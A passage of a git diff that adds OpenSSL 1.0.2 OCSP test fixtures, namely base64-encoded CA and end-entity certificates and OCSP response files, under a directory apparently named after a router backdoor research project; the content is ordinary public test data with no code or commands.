+MIIFBjCCA+6gAwIBAgIQEaO00OyNt3+doM1dLVEvQjANBgkqhkiG9w0BAQUFADCB
+gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV
+BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xMDA1MjQwMDAw
+MDBaFw0yMDA1MzAxMDQ4MzhaMIGOMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3Jl
+YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P
+RE8gQ0EgTGltaXRlZDE0MDIGA1UEAxMrQ09NT0RPIEV4dGVuZGVkIFZhbGlkYXRp
+b24gU2VjdXJlIFNlcnZlciBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
+ggEBAMxKljPNJY1n7iiWN4dG8PYEooR/U6qW5h+xAhxu7X0h1Nc8HqLYaS+ot/Wi
+7WRYZOFEZTZJQSABjTsT4gjzDPJXOZM3txyTRIOOvy3xoQV12m7ue28b6naDKHRK
+HCvT9cQDcpOvhs4JjDx11MkKL3Lzrb0OMDyEoXMfAyUUpY/D1vS15N2GevUZumjy
+hVSiMBHK0ZLLO3QGEqA3q2rYVBHfbJoWlLm0p2XGdC0x801S6VVRn8s+oo12mHDS
+b6ZlRS8bhbtbbfnywARmE4R6nc4n2PREnr+svpnba0/bWCGwiSe0jzLWS15ykV7f
+BZ3ZSS/0tm9QH3XLgJ3m0+TR8tMCAwEAAaOCAWkwggFlMB8GA1UdIwQYMBaAFAtY
+5YvGTBU3pECpMKkhvkc2Wlb/MB0GA1UdDgQWBBSIRFH/UCppXi2I9CG62Qzyzsvq
+fDAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB/wIBADA+BgNVHSAENzA1
+MDMGBFUdIAAwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1cmUuY29tb2RvLmNv
+bS9DUFMwSQYDVR0fBEIwQDA+oDygOoY4aHR0cDovL2NybC5jb21vZG9jYS5jb20v
+Q09NT0RPQ2VydGlmaWNhdGlvbkF1dGhvcml0eS5jcmwwdAYIKwYBBQUHAQEEaDBm
+MD4GCCsGAQUFBzAChjJodHRwOi8vY3J0LmNvbW9kb2NhLmNvbS9DT01PRE9BZGRU
+cnVzdFNlcnZlckNBLmNydDAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuY29tb2Rv
+Y2EuY29tMA0GCSqGSIb3DQEBBQUAA4IBAQCaQ7+vpHJezX1vf/T8PYy7cOYe3QT9
+P9ydn7+JdpvyhjH8f7PtKpFTLOKqsOPILHH3FYojHPFpLoH7sbxiC6saVBzZIl40
+TKX2Iw9dej3bQ81pfhc3Us1TocIR1FN4J2TViUFNFlW7kMvw2OTd3dMJZEgo/zIj
+hC+Me1UvzymINzR4DzOq/7fylqSbRIC1vmxWVKukgZ4lGChUOn8sY89ZIIwYazgs
+tN3t40DeDDYlV5rA0WCeXgNol64aO+pF11GZSe5EWVYLXrGPaOqKnsrSyaADfnAl
+9DLJTlCDh6I0SD1PNXf82Ijq9n0ezkO21cJqfjhmY03n7jLvDyToKmf6
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND2.ors
new file mode 100644
index 0000000..24c1cb2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND2.ors
@@ -0,0 +1,10 @@
+MIIB0woBAKCCAcwwggHIBgkrBgEFBQcwAQEEggG5MIIBtTCBnqIWBBQLWOWLxkwV
+N6RAqTCpIb5HNlpW/xgPMjAxMjEwMTAyMzAzMTlaMHMwcTBJMAkGBSsOAwIaBQAE
+FOy+ZAvtiWulchtVZmfKU1ZI9ewTBBQLWOWLxkwVN6RAqTCpIb5HNlpW/wIQEaO0
+0OyNt3+doM1dLVEvQoAAGA8yMDEyMTAxMDIzMDMxOVqgERgPMjAxMjEwMTQyMzAz
+MTlaMA0GCSqGSIb3DQEBBQUAA4IBAQCHn2nGfEUX/EJruMkTgh7GgB0u9cpAepaD
+sPv9gtl3KLUZyR+NbGMIa5/bpoJp0yg1z5VL6CLMusy3AF6Cn2fyaioDxG+yc+gA
+PcPFdEqiIMr+TP8s7qcEiE6WZddSSCqCn90VZSCWkpDhnCjDRwJLBBPU3803fdMz
+oguvyr7y6Koxik8X/iUe8EpSzAvmm4GZL3veTI+x7IezJSrhCS9zM0ZHjySjoDxC
++ljGH0EuWPTmFEqZVGIq3cuahIYzKItUbYnXU6ipi/2p42qbsFeok7eEN0EYsY1a
+vRATHGRmU7Q5HLCq4rQtZC1cis52Mvc9x1W4z/Gt5A3FtgElXXNA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND2_Cert_ICA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND2_Cert_ICA.pem
new file mode 100644
index 0000000..3260db3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND2_Cert_ICA.pem
@@ -0,0 +1,29 @@
+-----BEGIN CERTIFICATE-----
+MIIFBjCCA+6gAwIBAgIQEaO00OyNt3+doM1dLVEvQjANBgkqhkiG9w0BAQUFADCB
+gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV
+BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xMDA1MjQwMDAw
+MDBaFw0yMDA1MzAxMDQ4MzhaMIGOMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3Jl
+YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P
+RE8gQ0EgTGltaXRlZDE0MDIGA1UEAxMrQ09NT0RPIEV4dGVuZGVkIFZhbGlkYXRp
+b24gU2VjdXJlIFNlcnZlciBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
+ggEBAMxKljPNJY1n7iiWN4dG8PYEooR/U6qW5h+xAhxu7X0h1Nc8HqLYaS+ot/Wi
+7WRYZOFEZTZJQSABjTsT4gjzDPJXOZM3txyTRIOOvy3xoQV12m7ue28b6naDKHRK
+HCvT9cQDcpOvhs4JjDx11MkKL3Lzrb0OMDyEoXMfAyUUpY/D1vS15N2GevUZumjy
+hVSiMBHK0ZLLO3QGEqA3q2rYVBHfbJoWlLm0p2XGdC0x801S6VVRn8s+oo12mHDS
+b6ZlRS8bhbtbbfnywARmE4R6nc4n2PREnr+svpnba0/bWCGwiSe0jzLWS15ykV7f
+BZ3ZSS/0tm9QH3XLgJ3m0+TR8tMCAwEAAaOCAWkwggFlMB8GA1UdIwQYMBaAFAtY
+5YvGTBU3pECpMKkhvkc2Wlb/MB0GA1UdDgQWBBSIRFH/UCppXi2I9CG62Qzyzsvq
+fDAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB/wIBADA+BgNVHSAENzA1
+MDMGBFUdIAAwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1cmUuY29tb2RvLmNv
+bS9DUFMwSQYDVR0fBEIwQDA+oDygOoY4aHR0cDovL2NybC5jb21vZG9jYS5jb20v
+Q09NT0RPQ2VydGlmaWNhdGlvbkF1dGhvcml0eS5jcmwwdAYIKwYBBQUHAQEEaDBm
+MD4GCCsGAQUFBzAChjJodHRwOi8vY3J0LmNvbW9kb2NhLmNvbS9DT01PRE9BZGRU
+cnVzdFNlcnZlckNBLmNydDAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuY29tb2Rv
+Y2EuY29tMA0GCSqGSIb3DQEBBQUAA4IBAQCaQ7+vpHJezX1vf/T8PYy7cOYe3QT9
+P9ydn7+JdpvyhjH8f7PtKpFTLOKqsOPILHH3FYojHPFpLoH7sbxiC6saVBzZIl40
+TKX2Iw9dej3bQ81pfhc3Us1TocIR1FN4J2TViUFNFlW7kMvw2OTd3dMJZEgo/zIj
+hC+Me1UvzymINzR4DzOq/7fylqSbRIC1vmxWVKukgZ4lGChUOn8sY89ZIIwYazgs
+tN3t40DeDDYlV5rA0WCeXgNol64aO+pF11GZSe5EWVYLXrGPaOqKnsrSyaADfnAl
+9DLJTlCDh6I0SD1PNXf82Ijq9n0ezkO21cJqfjhmY03n7jLvDyToKmf6
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND2_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND2_Issuer_Root.pem
new file mode 100644
index 0000000..dc99810
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND2_Issuer_Root.pem
@@ -0,0 +1,23 @@
+-----BEGIN CERTIFICATE-----
+MIID0DCCArigAwIBAgIQIKTEf93f4cdTYwcTiHdgEjANBgkqhkiG9w0BAQUFADCB
+gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV
+BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xMTAxMDEwMDAw
+MDBaFw0zMDEyMzEyMzU5NTlaMIGBMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3Jl
+YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P
+RE8gQ0EgTGltaXRlZDEnMCUGA1UEAxMeQ09NT0RPIENlcnRpZmljYXRpb24gQXV0
+aG9yaXR5MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0ECLi3LjkRv3
+UcEbVASY06m/weaKXTuH+7uIzg3jLz8GlvCiKVCZrts7oVewdFFxze1CkU1B/qnI
+2GqGd0S7WWaXUF601CxwRM/aN5VCaTwwxHGzUvAhTaHYujl8HJ6jJJ3ygxaYqhZ8
+Q5sVW7euNJH+1GImGEaaP+vB+fGQV+useg2L23IwambV4EajcNxo2f8ESIl33rXp
++2dtQem8Ob0y2WIC8bGoPW43nOIv4tOiJovGuFVDiOEjPqXSJDlqR6sA1KGzqSX+
+DT+nHbrTUcELpNqsOO9VUCQFZUaTNE8tja3G1CEZ0o7KBWFxB3NH5YoZEr0ETc5O
+nKVIrLsm9wIDAQABo0IwQDAdBgNVHQ4EFgQUC1jli8ZMFTekQKkwqSG+RzZaVv8w
+DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEFBQAD
+ggEBAC/JxBwHO89hAgCx2SFRdXIDMLDEFh9sAIsQrK/xR9SuEDwMGvjUk2ysEDd8
+t6aDZK3N3w6HM503sMZ7OHKx8xoOo/lVem0DZgMXlUrxsXrfViEGQo+x06iF3u6X
+HWLrp+cxEmbDD6ZLLkGC9/3JG6gbr+48zuOcrigHoSybJMIPIyaDMouGDx8rEkYl
+Fo92kANr3ryqImhrjKGsKxE5pttwwn1y6TPn/CbxdFqR5p2ErPioBhlG5qfpqjQi
+pKGfeq23sqSaM4hxAjwu1nqyH6LKwN0vEJT9s4yEIHlG1QXUEOTS22RPuFvuG8Ug
+R1uUq27UlTMdphVx8fiUylQ5PsE=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND3.ors
new file mode 100644
index 0000000..2008418
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND3.ors
@@ -0,0 +1,10 @@
+MIIB1AoBAKCCAc0wggHJBgkrBgEFBQcwAQEEggG6MIIBtjCBn6IWBBStvZh6NLQm
+9/rEJlTvA73gJMtUGhgPMjAxMjEwMTExMTM2NDdaMHQwcjBKMAkGBSsOAwIaBQAE
+FHyxZlScq9tE7mImFq30ZXv3etWUBBStvZh6NLQm9/rEJlTvA73gJMtUGgIRAKcN
+bJWejX5BTb8DmevkCauAABgPMjAxMjEwMTExMTM2NDdaoBEYDzIwMTIxMDE1MTEz
+NjQ3WjANBgkqhkiG9w0BAQUFAAOCAQEAfnj3nh6z+USW6VlDWRytWpNmC1ZRwWlg
+P2+G4UF4HE8bMJkuiFLcZEVYTxlTYv+xAEpSFxdInFM2Q5C+O6pWOZ9NbikeR4oZ
+FTI1kAZ0Uw+YMpVM4ztvKBIpUSqlbi69iNJ9WGF6qzxVeqobSOyrjjwtTsuglUbR
++mshp/SP7Br2IIK+KM1vgsmVExPfGPYANyk7ki/Q8uUnjqkreeSa9WC2iJLGcybW
+YavDhYWALebUGukNeedkloYhdjPboPPxDkKNjakwIG8EkbJK7uXewMOHHOFvFTX3
+K388me8u5iQf4f3fj6ilEgs6f5Szzmb+vklPX0zIny/TVk2+Az7HmA==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND3_Cert_EE.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND3_Cert_EE.pem
new file mode 100644
index 0000000..c6a76d6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND3_Cert_EE.pem
@@ -0,0 +1,34 @@
+-----BEGIN CERTIFICATE-----
+MIIF3TCCBMWgAwIBAgIRAKcNbJWejX5BTb8DmevkCaswDQYJKoZIhvcNAQEFBQAw
+bzELMAkGA1UEBhMCU0UxFDASBgNVBAoTC0FkZFRydXN0IEFCMSYwJAYDVQQLEx1B
+ZGRUcnVzdCBFeHRlcm5hbCBUVFAgTmV0d29yazEiMCAGA1UEAxMZQWRkVHJ1c3Qg
+RXh0ZXJuYWwgQ0EgUm9vdDAeFw0xMDA1MDQwMDAwMDBaFw0xNTA1MDQyMzU5NTla
+MIIBCjELMAkGA1UEBhMCR0IxDzANBgNVBBETBk01IDNFUTEbMBkGA1UECBMSR3Jl
+YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRYwFAYDVQQJEw1UcmFm
+Zm9yZCBSb2FkMRYwFAYDVQQJEw1FeGNoYW5nZSBRdWF5MSUwIwYDVQQJExwzcmQg
+Rmxvb3IsIDI2IE9mZmljZSBWaWxsYWdlMRowGAYDVQQKExFDT01PRE8gQ0EgTGlt
+aXRlZDEaMBgGA1UECxMRQ29tb2RvIFByZW1pdW1TU0wxLDAqBgNVBAMTI2FkZHRy
+dXN0ZXh0ZXJuYWxjYXJvb3QuY29tb2RvY2EuY29tMIIBIjANBgkqhkiG9w0BAQEF
+AAOCAQ8AMIIBCgKCAQEAz5MM/mco91yFJNtF3t9c0x/bGds+zGAqJlHBXCR43og+
+3vgsBkCcn5M3PAqmL6XxilpsrEfS6RqtNcLfxwDyl7rr3qpJSM537Km1ZGOTHs0C
+i0JA4YBZFOxBwPO2nHQGD+t9kJx3auFdBLnjJc5Q3jFUmnyJ8D2h3P9BrHgOoIbO
+KYOUc/3zcqE6NttdbiuUMzlad8guhnXlWPCh2NJtNtMLDQxG7DWWDEm/Kt+CdKAR
+jko6kEp7nqBKyujjJoGD2nEtEnuuqiB9n6sgSXR1NGtecJrW8IqIS7hkcsxhGTI9
+jnY73+NiMV3nglejkNseTUdcEi6L94EdifXuVLgEAwIDAQABo4IB1TCCAdEwHwYD
+VR0jBBgwFoAUrb2YejS0Jvf6xCZU7wO94CTLVBowHQYDVR0OBBYEFDXpt6NocCrd
+7XZ2MLUa116TIesKMA4GA1UdDwEB/wQEAwIFoDAMBgNVHRMBAf8EAjAAMB0GA1Ud
+JQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjBGBgNVHSAEPzA9MDsGDCsGAQQBsjEB
+AgEDBDArMCkGCCsGAQUFBwIBFh1odHRwczovL3NlY3VyZS5jb21vZG8ubmV0L0NQ
+UzB7BgNVHR8EdDByMDigNqA0hjJodHRwOi8vY3JsLmNvbW9kb2NhLmNvbS9BZGRU
+cnVzdEV4dGVybmFsQ0FSb290LmNybDA2oDSgMoYwaHR0cDovL2NybC5jb21vZG8u
+bmV0L0FkZFRydXN0RXh0ZXJuYWxDQVJvb3QuY3JsMDQGCCsGAQUFBwEBBCgwJjAk
+BggrBgEFBQcwAYYYaHR0cDovL29jc3AuY29tb2RvY2EuY29tMFcGA1UdEQRQME6C
+I2FkZHRydXN0ZXh0ZXJuYWxjYXJvb3QuY29tb2RvY2EuY29tgid3d3cuYWRkdHJ1
+c3RleHRlcm5hbGNhcm9vdC5jb21vZG9jYS5jb20wDQYJKoZIhvcNAQEFBQADggEB
+AF2TF6xg8ZoBICoiQvjD2Z0SKcJRw1Dhj3HpGzV9F+Y0e/MxCXhYA+340JZxnC2P
+VA968QKFrNwDWiS9Klc+cs4k3HIeiZp3uHw1ezElqXXNa+S1CrSS03FqWeeugSrB
+xpuXCWDJSfD4DJq835hlEuXgxmAjsbuRUjaq1lxwSWnNoBkfMCCAgVlHtFljTlqq
+nwfBZcnj73+yiERgTvhN4gEL59ZzjFliKEUuXHZoe8klhn73cnY+XoRV0e7wU+Xj
+PzLoAhjGkS35hfDQTHdCwNBaN3iI2Q+HBjhfffAYFdK+Jo3kSXq12s7CJD7utAho
+xxRhA0l1ziJgrEubLi6ItNg=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND3_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND3_Issuer_Root.pem
new file mode 100644
index 0000000..20585f1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND3_Issuer_Root.pem
@@ -0,0 +1,25 @@
+-----BEGIN CERTIFICATE-----
+MIIENjCCAx6gAwIBAgIBATANBgkqhkiG9w0BAQUFADBvMQswCQYDVQQGEwJTRTEU
+MBIGA1UEChMLQWRkVHJ1c3QgQUIxJjAkBgNVBAsTHUFkZFRydXN0IEV4dGVybmFs
+IFRUUCBOZXR3b3JrMSIwIAYDVQQDExlBZGRUcnVzdCBFeHRlcm5hbCBDQSBSb290
+MB4XDTAwMDUzMDEwNDgzOFoXDTIwMDUzMDEwNDgzOFowbzELMAkGA1UEBhMCU0Ux
+FDASBgNVBAoTC0FkZFRydXN0IEFCMSYwJAYDVQQLEx1BZGRUcnVzdCBFeHRlcm5h
+bCBUVFAgTmV0d29yazEiMCAGA1UEAxMZQWRkVHJ1c3QgRXh0ZXJuYWwgQ0EgUm9v
+dDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALf3GjPm8gAELTngTlvt
+H7xsD821+iO2zt6bETOXpClMfZOfvUq8k+0DGuOPz+VtUFrWlymUWoCwSXrbLpX9
+uMq/NzgtHj6RQa1wVsfwTz/oMp50ysiQVOnGXw94nZpAPA6sYapeFI+eh6FqUNzX
+mk6vBbOmcZSccbNQYArHE504B4YCqOmoaSYYkKtMsE8jqzpPhNjfzp/haW+710LX
+a0Tkx63ubUFfclpxCDezeWWkWaCUN/cALw3CknLa0Dhy2xSoRcRdKn23tNbE7qzN
+E0S3ySvdQwAl+mG5aWpYIxG3pzOPVnVZ9c0p10a3CitlttNCbxWyuHv77+ldU9U0
+WicCAwEAAaOB3DCB2TAdBgNVHQ4EFgQUrb2YejS0Jvf6xCZU7wO94CTLVBowCwYD
+VR0PBAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wgZkGA1UdIwSBkTCBjoAUrb2YejS0
+Jvf6xCZU7wO94CTLVBqhc6RxMG8xCzAJBgNVBAYTAlNFMRQwEgYDVQQKEwtBZGRU
+cnVzdCBBQjEmMCQGA1UECxMdQWRkVHJ1c3QgRXh0ZXJuYWwgVFRQIE5ldHdvcmsx
+IjAgBgNVBAMTGUFkZFRydXN0IEV4dGVybmFsIENBIFJvb3SCAQEwDQYJKoZIhvcN
+AQEFBQADggEBALCb4IUlwtYj4g+WBpKdQZic2YR5gdkeWxQHIzZlj7DYd7usQWxH
+YINRsPkyPef89iYTx4AWpb9a/IfPeHmJIZriTAcKhjW88t5RxNKWt9x+Tu5w/Rw5
+6wwCURQtjr0W4MHfRnXnJK3s9EK0hZNwEGe6nQY1ShjTK3rMUUKhemPR5ruhxSvC
+Nr4TDea9Y355e6cJDUCrat2PisP29owaQgVR1EX1n6diIWgVIEM8med8vSTYqZEX
+c4g/VhsxOBi0cQ+azcgOno4uG+GMmIPLHzHxREzGBHNJdmAPx/i9F4BrLunMTA5a
+mnkPIAou1Z5jJh5VkpTYghdae9C8x49OhgQ=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_D1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_D1.ors
new file mode 100644
index 0000000..c8ce8d8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_D1.ors
@@ -0,0 +1,32 @@
+MIIFzwoBAKCCBcgwggXEBgkrBgEFBQcwAQEEggW1MIIFsTCBoKIWBBRf2uQDFpGg
+Ywh4P1y2H9bZ2/BQNBgPMjAxMjEwMTExMzI5NDJaMHUwczBLMAkGBSsOAwIaBQAE
+FKByDqBqfGICVPKo9Z3Se6Tzty+kBBSxsEr9HHUo+BxhqhP2+sGQPWsWowISESG8
+vx4IzALnkqQG05AvM+2bgAAYDzIwMTIxMDExMTAwMDAwWqARGA8yMDEyMTAxODEw
+MDAwMFowCwYJKoZIhvcNAQEFA4IBAQCX3gEX+JVfxuYmxBBxC9sNCi3o76ODIicr
+XMvm0DTO9VSyDBl7LDsMMgNMIDtO3flQSlBNZ2B9ikwyckXOSWXiXzybZVMdA/uq
+NchgkM9aChrlhG0AHZyYe/+dJSmEBFXkIomy+S6YQ7Mcs2s6WxCeWU7gB4XOy1zO
+/CvWjv0WQV1J2lZZ6pkvtECKAEjrVP275LA38HInFbYvVPXWzl4sDcX2TAxwUa4S
+xAJAfwl+B+oZSerZWGRo6KjZuB/OB31cB5n/lABmRez6Obi27D0UUCRv/eSbwOF4
+Ofaa/XzJt7sF7WpVgoR41HI88W7aN4vtcw1zcVsBmfRMUNYZSqtfoIID+DCCA/Qw
+ggPwMIIC2KADAgECAhIRISdENsrz1CSWG3VIBwfQERQwDQYJKoZIhvcNAQEFBQAw
+WTELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExLzAtBgNV
+BAMTJkdsb2JhbFNpZ24gRXh0ZW5kZWQgVmFsaWRhdGlvbiBDQSAtIEcyMB4XDTEy
+MDkxOTA3NDA1MFoXDTEyMTIxOTA4NDA1MFowgYUxCzAJBgNVBAYTAkJFMRkwFwYD
+VQQKExBHbG9iYWxTaWduIG52LXNhMUIwQAYDVQQDEzlHbG9iYWxTaWduIEV4dGVu
+ZGVkIFZhbGlkYXRpb24gQ0EgLSBHMiBPQ1NQIHJlc3BvbmRlciAtIDIxFzAVBgNV
+BAUTDjIwMTIwOTE5MDk0MDAwMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
+AQEAnCgMsBO+IxIqCnXCOfXJoIC3wj+f0s4DV9h2gJBzisWXkaJD2DfNrd0kHUXK
+qVVPUxnA4G5iZu0Z385/KiOt1/P6vQ/Z2/AsEh/8Z/hIyeZCHL31wrSZW4yLeZwi
+M76wPiBHJxPun681HQlVs/OGKSHnbHc1XJAIeA/M8u+lLWqIKB+AJ82TrOqUMj1s
+LjGhQNs84xPliONN5K7DrEy+Y65X/rFxN77Smw+UtcH1GgH2NgaHH8dpt1m25sgm
+UxZWhdx66opB/lbRQwWdGt7MC0kJFaWHDZq64DTuYoekFYSxAFu0nd0EekEHEJEi
+9mquB9cv/96SuEJl8BcUWU/1LwIDAQABo4GEMIGBMAkGA1UdEwQCMAAwDgYDVR0P
+AQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMJMA8GCSsGAQUFBzABBQQCBQAw
+HQYDVR0OBBYEFF/a5AMWkaBjCHg/XLYf1tnb8FA0MB8GA1UdIwQYMBaAFLCwSv0c
+dSj4HGGqE/b6wZA9axajMA0GCSqGSIb3DQEBBQUAA4IBAQCKRl1iXFmOQtLseDWP
+Y5icDDBGiRi17CGgvIzGJi/ha0PhbO+X0TmQIEnRX3Mu0Er/Mm4RZSjMtJ2iZRh3
+tGf4Dn+jKgKOmgXC3oOG/l8RPHLf0yaPSdn/z0TXtA30vTFBLlFeWnhbfhovea4+
+snPdBxLqWZdtxmiwojgqA7YATCWwavizrBr09YRyDwzgtpZ2BwMruGuFuV9FsEwL
+PCM53yFlrM32oFghyfyE5kYjgnnueKM+pw1kA0jgb1CnVJRrMEN1TXuXDAZLtHKG
+5X/drah1JtkoZhCzxzZ3bYdVDQJ90OHFqM58lwGD6z3XuPKrHDKZKt+CPIsl5g7p
+4J2l
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_D2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_D2.ors
new file mode 100644
index 0000000..1d562fa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WIKH_D2.ors
@@ -0,0 +1,32 @@
+MIIF4AoBAKCCBdkwggXVBgkrBgEFBQcwAQEEggXGMIIFwjCBmaIWBBTqlwecTarB
+yVdbHxANRLCFYj1mqBgPMjAxMjEwMTExMzMwMTBaMG4wbDBEMAkGBSsOAwIaBQAE
+FLdXtbacB/gWIxOOkMkqDr4yAaoxBBRhe2YaRQ2XyolQL30EzTSo//z9SwILBAAA
+AAABL07hRxCAABgPMjAxMjEwMDEwNjAwMDBaoBEYDzIwMTMwNDE1MDYwMDAwWjAL
+BgkqhkiG9w0BAQUDggEBAA0H7bvcULg1GayFtQVrYDyW0feOEMNGLmgaGuwRdrY3
+KuWyNJLUUJKQZnOkdT8A4RpVX8xD4EgVyOqRACUahgdgp0g3QOn+vf2Zyf+NJIgW
+woF5qaJgCOeIOw5O6F4r1vUhp8NvqXHotswgG58Nzz6UMD+uyIgq5o8uzOjryEm6
+wO2X+KvN9sMzkeZhNvAHkgBQL8CG4CggWnzn7At1DmhhsizfhDrosigM4Zr6Sm6z
+v1YfSPznD0b3TQ7RzvpbJPofF2aJXMIMxdKR5pemuevTDR2+JCXjVPsD/ZODFykc
+rsQeqx2vTOIg84PRKboXjCAwHn4rIN7JJtQqebLtD9egggQQMIIEDDCCBAgwggLw
+oAMCAQICCwQAAAAAAThXovYBMA0GCSqGSIb3DQEBBQUAMFcxCzAJBgNVBAYTAkJF
+MRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRsw
+GQYDVQQDExJHbG9iYWxTaWduIFJvb3QgQ0EwHhcNMTIwNzA1MTgwMDAwWhcNMTMw
+NzA1MTgwMDAwWjBZMQswCQYDVQQGEwJCRTEZMBcGA1UEChMQR2xvYmFsU2lnbiBu
+di1zYTEvMC0GA1UEAxMmR2xvYmFsU2lnbiBPQ1NQIGZvciBSb290IFIxIC0gQnJh
+bmNoIDEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDP2QF8p0+Fb7ID
+MwwD1gEr2oazjqbW28EZr3YEyMPk+7VFaGePSO1xjBGIE48Q7m7d6p6ZXCzlBZEi
+oudrHSr3WDqdIVKLDrZIDkgEgdjJE72Hq6Pf5CEGXyebbODm4sV96EfewSvOOYLL
+866g3aoVhLDK02ny+Q5OsokW7nhnmGMMh10tZqR5VmdQTiw8MgeqUxBEaEO4WH2J
+ltgSsgNJBNBYuDgnn5ryzVqhvmCJvYZMYeN6qZFKy1MgHcR+wEpGLPlRL4ttu6e5
+MJrVta7dVFobHUHoFog97LtQT1PY0Ubaihswjge5O04bYeCrgSSjr1e4xH/KDxRw
+yyhoscaFAgMBAAGjgdIwgc8wDgYDVR0PAQH/BAQDAgeAMB0GA1UdDgQWBBTqlwec
+TarByVdbHxANRLCFYj1mqDBMBgNVHSAERTBDMEEGCSsGAQQBoDIBXzA0MDIGCCsG
+AQUFBwIBFiZodHRwczovL3d3dy5nbG9iYWxzaWduLmNvbS9yZXBvc2l0b3J5LzAJ
+BgNVHRMEAjAAMBMGA1UdJQQMMAoGCCsGAQUFBwMJMB8GA1UdIwQYMBaAFGB7ZhpF
+DZfKiVAvfQTNNKj//P1LMA8GCSsGAQUFBzABBQQCBQAwDQYJKoZIhvcNAQEFBQAD
+ggEBAHiC6N1uF29d7CmiVapA8Nr1xLSVeIkBd4A8yHsUTQ7ATI7bwT14QUV4awe7
